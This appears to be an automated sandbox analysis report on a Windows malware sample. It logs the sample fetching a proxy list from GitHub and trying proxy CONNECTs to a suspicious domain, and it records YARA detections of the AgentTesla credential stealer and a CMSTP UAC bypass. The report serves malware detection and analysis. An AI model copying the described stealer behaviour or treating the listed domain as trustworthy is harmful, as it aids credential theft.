                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:43.116173029 CET131INHTTP/1.1 503 Too many open connections
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449731140.82.114.34436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-23 08:45:14 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                                                                                      Host: github.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-02-23 08:45:14 UTC506INHTTP/1.1 200 OK
                                                                                                      Server: GitHub.com
                                                                                                      Date: Fri, 23 Feb 2024 08:45:14 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                      ETag: W/"21a8c92f046ecffdea5c08c191ebc359"
                                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                      X-Frame-Options: deny
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 0
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      2024-02-23 08:45:14 UTC3594INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                                      2024-02-23 08:45:14 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                      Data Ascii: connection: close
                                                                                                      2024-02-23 08:45:14 UTC1370INData Raw: 32 32 45 43 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                                      Data Ascii: 22EC<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                                      2024-02-23 08:45:14 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                      Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                                      2024-02-23 08:45:14 UTC1370INData Raw: 67 69 74 68 75 62 2d 38 65 61 61 62 32 32 38 34 34 38 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                                      Data Ascii: github-8eaab228448a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                                      2024-02-23 08:45:14 UTC1370INData Raw: 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c
                                                                                                      Data Ascii: -parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_hydro-anal
                                                                                                      2024-02-23 08:45:14 UTC1370INData Raw: 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 64 65 74 61 69 6c 73 2d 64 69 61 6c 6f 67 2d 65 6c 65 6d 65 6e 2d 32 39 64 63 33 30 2d 61 32 61 37 31 66 31 31 61 35 30 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a
                                                                                                      Data Ascii: ation/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-29dc30-a2a71f11a507.js"></script><script crossorigin="anonymous" defer="defer" type="application/j
                                                                                                      2024-02-23 08:45:14 UTC1370INData Raw: 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 2d 39 37 38 61 62 63 30 2d 61 64 64 39 33 39 63 37 35 31 63 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6c 69 74 2d 68 74 6d 6c 5f 6c 69
                                                                                                      Data Ascii: b_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0-add939c751ce.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_li
                                                                                                      2024-02-23 08:45:14 UTC728INData Raw: 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 39 35 62 38 34 65 65 36 62 63 33 34 2e 6a 73 22 3e 3c 2f 73 63 72 69
                                                                                                      Data Ascii: s"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.js"></scri
                                                                                                      2024-02-23 08:45:14 UTC1370INData Raw: 35 44 31 34 0d 0a 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 74 61 73 6b 2d 6c 69 73 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6f 6e 66 6f 63 75 73 5f 74 73 2d 61 70 70 5f 61 73 73 2d 34 32 31 63 65 63 2d 37 35 31 63 61 61 30 30 37 32 62 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79
                                                                                                      Data Ascii: 5D14ymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-751caa0072bd.js"></script><script crossorigin="anony


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.451515172.67.190.934436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-23 08:45:20 UTC143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      2024-02-23 08:45:20 UTC161INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      2024-02-23 08:45:20 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.454575102.223.20.2174436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-23 08:45:32 UTC143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      2024-02-23 08:45:32 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:32 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      Content-Length: 638
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      2024-02-23 08:45:32 UTC638INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.455000172.67.190.934436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-23 08:45:40 UTC113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      2024-02-23 08:45:40 UTC161INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:40 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      2024-02-23 08:45:40 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:09:45:02
                                                                                                      Start date:23/02/2024
                                                                                                      Path:C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      Imagebase:0x11991f70000
                                                                                                      File size:40'448 bytes
                                                                                                      MD5 hash:72B14801621EB5AAEE0715DFC65D8B72
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2295238294.00000119A408F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2295238294.00000119A408F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2295238294.00000119A51F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2295238294.00000119A51F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:09:45:40
                                                                                                      Start date:23/02/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                                      Imagebase:0xf90000
                                                                                                      File size:42'064 bytes
                                                                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2959651140.000000000333E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2959651140.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2959651140.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2959651140.0000000003369000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2951796876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2951796876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      Reset < >
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2959058244.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_31a0000_InstallUtil.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5c3f4a9346d3a43880dfa93dce0e4820274caad8ca5f206fcf4b39eae774e980
                                                                                                        • Instruction ID: 715dac479fa4ac4c184b1e6346963ce9626d5ed88b4fa6b12d609d8347754de1
                                                                                                        • Opcode Fuzzy Hash: 5c3f4a9346d3a43880dfa93dce0e4820274caad8ca5f206fcf4b39eae774e980
                                                                                                        • Instruction Fuzzy Hash: 3453D831D10B1A8ADB11EF68C894599F7B1FF99300F15D79AE458A7221FB70AAC4CF81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2959058244.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_31a0000_InstallUtil.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 06a9a1844f4367402045972fff2daee4390bf350dd5ce14b96258022cf8de9df
                                                                                                        • Instruction ID: 7f153ff54356240e3669ee86c625376215751093775d4f2b3da0d26e589667aa
                                                                                                        • Opcode Fuzzy Hash: 06a9a1844f4367402045972fff2daee4390bf350dd5ce14b96258022cf8de9df
                                                                                                        • Instruction Fuzzy Hash: 56332F35D10B198FCB11DF68C8906A9F7B5FF99300F15C79AE458AB211EB70AAC5CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2959058244.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_31a0000_InstallUtil.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5cb08dc42f0aec727b05b4a4bfeb91d3efa9174dcc5795f3688410ea5cf4ac75
                                                                                                        • Instruction ID: 5e456c4c2f0d8646577127a9b36040a3432bd49e0ecbe59b6f82b117ed62670e
                                                                                                        • Opcode Fuzzy Hash: 5cb08dc42f0aec727b05b4a4bfeb91d3efa9174dcc5795f3688410ea5cf4ac75
                                                                                                        • Instruction Fuzzy Hash: 4BB15E74E006098FDB14CFAEC89179DBBF2AF88315F198529D419EB354EFB49845CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2959058244.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_31a0000_InstallUtil.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6f22a1c711d4f838766d4bfcb996f2c33b4cb8961dd9b71d34fb95b13714aae7
                                                                                                        • Instruction ID: 323c1bc85f719754604eaccf5c0fbe59dfb94089fdf86b1257cd99de16021f37
                                                                                                        • Opcode Fuzzy Hash: 6f22a1c711d4f838766d4bfcb996f2c33b4cb8961dd9b71d34fb95b13714aae7
                                                                                                        • Instruction Fuzzy Hash: 95917E74E106098FDF14CFAEC9857DEBBF2AF88305F188529E415AB354EB749846CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2959058244.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_31a0000_InstallUtil.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LR^q$LR^q
                                                                                                        • API String ID: 0-4089051495
                                                                                                        • Opcode ID: 120dde861af966b6749fbf2d0b0df3e609b07bd6460f838dce7d8c67582c242f
                                                                                                        • Instruction ID: be120fa990438f877d93158608d938a33a09f28824a49787937220c54a5e457a
                                                                                                        • Opcode Fuzzy Hash: 120dde861af966b6749fbf2d0b0df3e609b07bd6460f838dce7d8c67582c242f
                                                                                                        • Instruction Fuzzy Hash: 6141C238F006059FDB15DBB8C4646AEB7B6EF8A301F288469E405EB380EB71DD468791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2959058244.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_31a0000_InstallUtil.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PH^q
                                                                                                        • API String ID: 0-2549759414
